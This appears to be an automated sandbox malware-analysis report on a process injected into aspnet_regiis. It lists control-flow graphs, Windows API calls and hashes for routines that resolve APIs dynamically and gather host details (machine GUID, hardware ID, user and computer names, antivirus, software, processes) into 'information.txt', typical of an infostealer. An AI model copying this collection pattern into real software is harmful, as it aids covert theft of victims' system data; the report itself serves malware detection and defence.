                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 912 2a18643-2a18653 call 2a1859a 915 2a18844-2a188a1 LoadLibraryA * 5 912->915 916 2a18659-2a1883f call 2a07d47 GetProcAddress * 20 912->916 917 2a188a3-2a188b0 GetProcAddress 915->917 918 2a188b5-2a188bc 915->918 916->915 917->918 920 2a188e7-2a188ee 918->920 921 2a188be-2a188e2 GetProcAddress * 2 918->921 923 2a188f0-2a188fd GetProcAddress 920->923 924 2a18902-2a18909 920->924 921->920 923->924 925 2a1890b-2a18918 GetProcAddress 924->925 926 2a1891d-2a18924 924->926 925->926 928 2a18926-2a1894a GetProcAddress * 2 926->928 929 2a1894f 926->929 928->929
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18684
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A1869B
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A186B2
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A186C9
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A186E0
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A186F7
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A1870E
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18725
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A1873C
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18753
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A1876A
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18781
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18798
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A187AF
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A187C6
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A187DD
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A187F4
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A1880B
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18822
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18839
                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02A184C2), ref: 02A1884A
                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02A184C2), ref: 02A1885B
                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02A184C2), ref: 02A1886C
                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02A184C2), ref: 02A1887D
                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02A184C2), ref: 02A1888E
                                                                                                                                                                              • GetProcAddress.KERNEL32(76DA0000,02A184C2), ref: 02A188AA
                                                                                                                                                                              • GetProcAddress.KERNEL32(75840000,02A184C2), ref: 02A188C5
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A188DC
                                                                                                                                                                              • GetProcAddress.KERNEL32(753A0000,02A184C2), ref: 02A188F7
                                                                                                                                                                              • GetProcAddress.KERNEL32(77300000,02A184C2), ref: 02A18912
                                                                                                                                                                              • GetProcAddress.KERNEL32(774D0000,02A184C2), ref: 02A1892D
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18944
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                              • Opcode ID: 9e566fb7b1f91ca51c97a365d5a7de9be937287ae0fbe2ca1cad5765d097c648
                                                                                                                                                                              • Instruction ID: 6b3cb6d02573d0a662d37dafd51d92dbf50a097ff396d2d04acf6b628e636e89
                                                                                                                                                                              • Opcode Fuzzy Hash: 9e566fb7b1f91ca51c97a365d5a7de9be937287ae0fbe2ca1cad5765d097c648
                                                                                                                                                                              • Instruction Fuzzy Hash: 24711C75C90332AFDB025FA1F948B243BA2F71C6513508F66E915A2220E732C6F4EF55
                                                                                                                                                                              Function 02A13B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674stringCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 930 2a13b86-2a145a5 call 2a104e7 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10cc0 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a115d4 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a11684 call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a109a2 call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 GetCurrentProcessId call 2a1224a call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10b30 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a11807 call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a11997 call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10c85 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10c53 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a11563 call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10ddb call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10cc0 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10d2e call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10f51 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a11007 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10fba call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a11119 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a11192 call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a114a5 call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a11203 call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a11203 call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a10609 call 2a1058d call 2a02920 call 2a01cfd lstrlen call 2a104e7 call 2a16e97 call 2a02920 * 2 call 2a01cde
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A10CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,02A365B6,?,?,?), ref: 02A10CD8
                                                                                                                                                                                • Part of subcall function 02A10CC0: RtlAllocateHeap.NTDLL(00000000), ref: 02A10CDF
                                                                                                                                                                                • Part of subcall function 02A10CC0: GetLocalTime.KERNEL32(?), ref: 02A10CEB
                                                                                                                                                                                • Part of subcall function 02A10CC0: wsprintfA.USER32 ref: 02A10D16
                                                                                                                                                                                • Part of subcall function 02A115D4: _memset.LIBCMT ref: 02A11607
                                                                                                                                                                                • Part of subcall function 02A115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 02A11626
                                                                                                                                                                                • Part of subcall function 02A115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 02A1164B
                                                                                                                                                                                • Part of subcall function 02A115D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 02A11657
                                                                                                                                                                                • Part of subcall function 02A115D4: CharToOemA.USER32(?,?), ref: 02A1166B
                                                                                                                                                                                • Part of subcall function 02A11684: GetCurrentHwProfileA.ADVAPI32(?), ref: 02A1169F
                                                                                                                                                                                • Part of subcall function 02A11684: _memset.LIBCMT ref: 02A116CE
                                                                                                                                                                                • Part of subcall function 02A11684: lstrcat.KERNEL32(?,00000000), ref: 02A116F6
                                                                                                                                                                                • Part of subcall function 02A11684: lstrcat.KERNEL32(?,02A36ECC), ref: 02A11713
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 02A109D5
                                                                                                                                                                                • Part of subcall function 02A109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02A10A15
                                                                                                                                                                                • Part of subcall function 02A109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 02A10A6A
                                                                                                                                                                                • Part of subcall function 02A109A2: RtlAllocateHeap.NTDLL(00000000), ref: 02A10A71
                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(Path: ,02A3687C,HWID: ,02A36870,GUID: ,02A36864,00000000,MachineID: ,02A36854,00000000,Date: ,02A36848,02A36844,02A379AC,Version: ,02A365B6), ref: 02A13DDB
                                                                                                                                                                                • Part of subcall function 02A1224A: OpenProcess.KERNEL32(00000410,00000000,02A13DEA,00000000,?), ref: 02A1226C
                                                                                                                                                                                • Part of subcall function 02A1224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 02A12287
                                                                                                                                                                                • Part of subcall function 02A1224A: CloseHandle.KERNEL32(00000000), ref: 02A1228E
                                                                                                                                                                                • Part of subcall function 02A10B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10B44
                                                                                                                                                                                • Part of subcall function 02A10B30: RtlAllocateHeap.NTDLL(00000000), ref: 02A10B4B
                                                                                                                                                                                • Part of subcall function 02A11807: __EH_prolog3_catch_GS.LIBCMT ref: 02A1180E
                                                                                                                                                                                • Part of subcall function 02A11807: CoInitializeEx.COMBASE(00000000,00000000), ref: 02A1181F
                                                                                                                                                                                • Part of subcall function 02A11807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A11830
                                                                                                                                                                                • Part of subcall function 02A11807: CoCreateInstance.COMBASE(02A32F00,00000000,00000001,02A32E30,?), ref: 02A1184A
                                                                                                                                                                                • Part of subcall function 02A11807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A11880
                                                                                                                                                                                • Part of subcall function 02A11807: VariantInit.OLEAUT32(?), ref: 02A118DB
                                                                                                                                                                                • Part of subcall function 02A11997: __EH_prolog3_catch.LIBCMT ref: 02A1199E
                                                                                                                                                                                • Part of subcall function 02A11997: CoInitializeEx.COMBASE(00000000,00000000), ref: 02A119AD
                                                                                                                                                                                • Part of subcall function 02A11997: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A119BE
                                                                                                                                                                                • Part of subcall function 02A11997: CoCreateInstance.COMBASE(02A32F00,00000000,00000001,02A32E30,?), ref: 02A119D8
                                                                                                                                                                                • Part of subcall function 02A11997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A11A0E
                                                                                                                                                                                • Part of subcall function 02A11997: VariantInit.OLEAUT32(?), ref: 02A11A5D
                                                                                                                                                                                • Part of subcall function 02A10C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A01385), ref: 02A10C91
                                                                                                                                                                                • Part of subcall function 02A10C85: RtlAllocateHeap.NTDLL(00000000), ref: 02A10C98
                                                                                                                                                                                • Part of subcall function 02A10C85: GetComputerNameA.KERNEL32(00000000,02A01385), ref: 02A10CAC
                                                                                                                                                                                • Part of subcall function 02A10C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A013B9), ref: 02A10C5F
                                                                                                                                                                                • Part of subcall function 02A10C53: RtlAllocateHeap.NTDLL(00000000), ref: 02A10C66
                                                                                                                                                                                • Part of subcall function 02A10C53: GetUserNameA.ADVAPI32(00000000,02A013B9), ref: 02A10C7A
                                                                                                                                                                                • Part of subcall function 02A11563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 02A11575
                                                                                                                                                                                • Part of subcall function 02A11563: GetDeviceCaps.GDI32(00000000,00000008), ref: 02A11580
                                                                                                                                                                                • Part of subcall function 02A11563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02A1158B
                                                                                                                                                                                • Part of subcall function 02A11563: ReleaseDC.USER32(00000000,00000000), ref: 02A11596
                                                                                                                                                                                • Part of subcall function 02A11563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,02A14098,?,Display Resolution: ,02A368F4,00000000,User Name: ,02A368E4,00000000,Computer Name: ,02A368D0,AV: ,02A368C4), ref: 02A115A2
                                                                                                                                                                                • Part of subcall function 02A11563: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02A115A9
                                                                                                                                                                                • Part of subcall function 02A11563: wsprintfA.USER32 ref: 02A115BB
                                                                                                                                                                                • Part of subcall function 02A10DDB: GetKeyboardLayoutList.USER32(00000000,00000000,02A3670D,?,?), ref: 02A10E0C
                                                                                                                                                                                • Part of subcall function 02A10DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 02A10E1A
                                                                                                                                                                                • Part of subcall function 02A10DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02A10E28
                                                                                                                                                                                • Part of subcall function 02A10DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 02A10E57
                                                                                                                                                                                • Part of subcall function 02A10DDB: LocalFree.KERNEL32(00000000), ref: 02A10EFF
                                                                                                                                                                                • Part of subcall function 02A10D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A10D49
                                                                                                                                                                                • Part of subcall function 02A10D2E: RtlAllocateHeap.NTDLL(00000000), ref: 02A10D50
                                                                                                                                                                                • Part of subcall function 02A10D2E: GetTimeZoneInformation.KERNEL32(?), ref: 02A10D5F
                                                                                                                                                                                • Part of subcall function 02A10D2E: wsprintfA.USER32 ref: 02A10D7D
                                                                                                                                                                                • Part of subcall function 02A10F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000,Local Time: ,02A3692C), ref: 02A10F65
                                                                                                                                                                                • Part of subcall function 02A10F51: RtlAllocateHeap.NTDLL(00000000), ref: 02A10F6C
                                                                                                                                                                                • Part of subcall function 02A10F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A36888,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000,Local Time: ), ref: 02A10F8A
                                                                                                                                                                                • Part of subcall function 02A10F51: RegQueryValueExA.KERNEL32(02A36888,00000000,00000000,00000000,000000FF,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000), ref: 02A10FA6
                                                                                                                                                                                • Part of subcall function 02A10F51: RegCloseKey.ADVAPI32(02A36888,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000,Local Time: ,02A3692C,Keyboard Languages: ,02A36910), ref: 02A10FAF
                                                                                                                                                                                • Part of subcall function 02A11007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 02A1107D
                                                                                                                                                                                • Part of subcall function 02A11007: wsprintfA.USER32 ref: 02A110DB
                                                                                                                                                                                • Part of subcall function 02A10FBA: GetSystemInfo.KERNEL32(?), ref: 02A10FD4
                                                                                                                                                                                • Part of subcall function 02A10FBA: wsprintfA.USER32 ref: 02A10FEC
                                                                                                                                                                                • Part of subcall function 02A11119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,02A36910,Display Resolution: ,02A368F4,00000000,User Name: ,02A368E4,00000000,Computer Name: ,02A368D0,AV: ,02A368C4,Install Date: ), ref: 02A11131
                                                                                                                                                                                • Part of subcall function 02A11119: RtlAllocateHeap.NTDLL(00000000), ref: 02A11138
                                                                                                                                                                                • Part of subcall function 02A11119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 02A11154
                                                                                                                                                                                • Part of subcall function 02A11119: wsprintfA.USER32 ref: 02A1117A
                                                                                                                                                                                • Part of subcall function 02A11192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 02A111E9
                                                                                                                                                                                • Part of subcall function 02A114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,02A36712,?,?), ref: 02A114D4
                                                                                                                                                                                • Part of subcall function 02A114A5: Process32First.KERNEL32(00000000,00000128), ref: 02A114E4
                                                                                                                                                                                • Part of subcall function 02A114A5: Process32Next.KERNEL32(00000000,00000128), ref: 02A11542
                                                                                                                                                                                • Part of subcall function 02A114A5: CloseHandle.KERNEL32(00000000), ref: 02A1154D
                                                                                                                                                                                • Part of subcall function 02A11203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,02A3670F,00000000,?,?), ref: 02A11273
                                                                                                                                                                                • Part of subcall function 02A11203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 02A112B0
                                                                                                                                                                                • Part of subcall function 02A11203: wsprintfA.USER32 ref: 02A112DD
                                                                                                                                                                                • Part of subcall function 02A11203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 02A112FC
                                                                                                                                                                                • Part of subcall function 02A11203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 02A11332
                                                                                                                                                                                • Part of subcall function 02A11203: lstrlen.KERNEL32(?), ref: 02A11347
                                                                                                                                                                                • Part of subcall function 02A11203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,02A36E8C), ref: 02A113DC
                                                                                                                                                                                • Part of subcall function 02A11203: RegCloseKey.ADVAPI32(?), ref: 02A11446
                                                                                                                                                                                • Part of subcall function 02A11203: RegCloseKey.ADVAPI32(?), ref: 02A11472
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,02A36910,Display Resolution: ,02A368F4,00000000,User Name: ,02A368E4,00000000), ref: 02A14563
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$Allocate$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                              • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                              • API String ID: 2795203874-1014693891
                                                                                                                                                                              • Opcode ID: ae29d8030fb6697c09d6200aaf71bcce997ee0864bc5b0737cf8f2d7ea66a86b
                                                                                                                                                                              • Instruction ID: f4a7a848146233d4e1cdb7f3ca1c477b5268ab6fe2182c8152c834003fea2ba5
                                                                                                                                                                              • Opcode Fuzzy Hash: ae29d8030fb6697c09d6200aaf71bcce997ee0864bc5b0737cf8f2d7ea66a86b
                                                                                                                                                                              • Instruction Fuzzy Hash: 81524831D8012DAADF01FBA4EE85ADDB7B6AF04760F5141619E2077160DF70BE8A8F94
                                                                                                                                                                              Function 02A0884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405memoryfilestringCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1774 2a0884c-2a08865 call 2a10795 1777 2a08867-2a0886c 1774->1777 1778 2a0886e-2a0887e call 2a10795 1774->1778 1779 2a08885-2a0888d call 2a10549 1777->1779 1783 2a08880 1778->1783 1784 2a0888f-2a0889f call 2a10795 1778->1784 1786 2a088a5-2a08922 call 2a104e7 call 2a11c4a call 2a10609 call 2a105c7 call 2a10609 call 2a105c7 call 2a1058d call 2a02920 * 5 1779->1786 1783->1779 1784->1786 1790 2a08d72-2a08d96 call 2a02920 * 3 call 2a01cde 1784->1790 1822 2a08939-2a08949 CopyFileA 1786->1822 1823 2a08924-2a08936 call 2a10519 call 2a122b0 1822->1823 1824 2a0894b-2a08984 call 2a104e7 call 2a10609 call 2a1058d call 2a02920 1822->1824 1823->1822 1837 2a08986-2a089d7 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 call 2a10609 call 2a1058d 1824->1837 1838 2a089dc-2a08a5b call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a10609 call 2a1058d call 2a02920 1824->1838 1871 2a08a60-2a08a79 call 2a02920 1837->1871 1838->1871 1881 2a08d4b-2a08d57 DeleteFileA call 2a02920 1871->1881 1882 2a08a7f-2a08a9a 1871->1882 1885 2a08d5c-2a08d6b call 2a02920 * 2 1881->1885 1890 2a08aa0-2a08ab6 GetProcessHeap RtlAllocateHeap 1882->1890 1891 2a08d37-2a08d4a 1882->1891 1900 2a08d6d call 2a02920 1885->1900 1893 2a08cda-2a08ce7 1890->1893 1891->1881 1898 2a08abb-2a08b9d call 2a104e7 * 6 call 2a01cfd call 2a10519 call 2a0826d StrCmpCA 1893->1898 1899 2a08ced-2a08cf9 lstrlen 1893->1899 1937 2a08ba3-2a08bb6 StrCmpCA 1898->1937 1938 2a08d97-2a08dd9 call 2a02920 * 8 1898->1938 1899->1891 1902 2a08cfb-2a08d27 call 2a01cfd lstrlen call 2a10519 call 2a16e97 1899->1902 1900->1790 1914 2a08d2c-2a08d32 call 2a02920 1902->1914 1914->1891 1940 2a08bc0 1937->1940 1941 2a08bb8-2a08bbe 1937->1941 1938->1900 1943 2a08bc6-2a08bde call 2a10549 StrCmpCA 1940->1943 1941->1943 1949 2a08be0-2a08be6 1943->1949 1950 2a08be8 1943->1950 1952 2a08bee-2a08bf9 call 2a10549 1949->1952 1950->1952 1958 2a08c08-2a08cd5 lstrcat * 14 call 2a02920 * 7 1952->1958 1959 2a08bfb-2a08c03 call 2a10549 1952->1959 1958->1893 1959->1958
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10795: StrCmpCA.SHLWAPI(?,?,?,02A08863,?,?,?), ref: 02A1079E
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A08941
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A122B0: _memset.LIBCMT ref: 02A122D7
                                                                                                                                                                                • Part of subcall function 02A122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 02A1237D
                                                                                                                                                                                • Part of subcall function 02A122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 02A1238B
                                                                                                                                                                                • Part of subcall function 02A122B0: CloseHandle.KERNEL32(00000000), ref: 02A12392
